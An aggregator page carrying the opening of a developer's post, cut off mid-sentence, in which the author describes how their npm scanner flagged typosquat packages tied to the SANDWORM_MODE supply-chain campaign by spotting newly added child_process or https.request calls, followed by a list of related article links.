My npm monitoring flagged SANDWORM_MODE packages -> looking for expert input

Socket just published their research on SANDWORM_MODE , a supply chain campaign targeting AI coding tools. I checked my logs. My scanner MUAD'DIB flagged several of these packages via temporal analysis - it compares versions and detects when dangerous primitives like child_process or https.request are suddenly added. What my monitoring caught Package Date Severity Finding claud-code@0.2.0 Feb 14 CRITICAL child_process added suddenly cloude-code@0.2.0 Feb 14 CRITICAL child_process added suddenly suport-color@1.0.2 Feb 14 HIGH https_request + publish_burst opencraw@2026.2.15 Feb 17 HIGH AST findings opencraw@2026.2.16 Feb 17 HIGH AST findings Socket published their report on February 22. How temporal analysis works MUAD'DIB compares package versions. If a new version suddenly adds sensitive APIs that weren't there before, it flags it. A color utility package ( suport-color ) has no reason to suddenly start making HTTPS requests. A typosquat of Claude Code ( claud-code ) adding child_proc

My npm monitoring flagged SANDWORM_MODE packages -> looking for expert input

Related Articles

Mamba-UNet: UNet-Like Pure Visual Mamba for Medical Image Segmentation

telecheck and tyms past

What Organizations Know About Themselves

Making HNSW actually work with WHERE clauses

Stop Using Claude Code Like a Chat Window

Related Articles

News
Mamba-UNet: UNet-Like Pure Visual Mamba for Medical Image Segmentation
Dev.to • 1d ago

News
telecheck and tyms past
Lobsters • 1d ago

News
What Organizations Know About Themselves
Medium Programming • 1d ago

News
Making HNSW actually work with WHERE clauses
Lobsters • 2d ago

News
Stop Using Claude Code Like a Chat Window
Medium Programming • 2d ago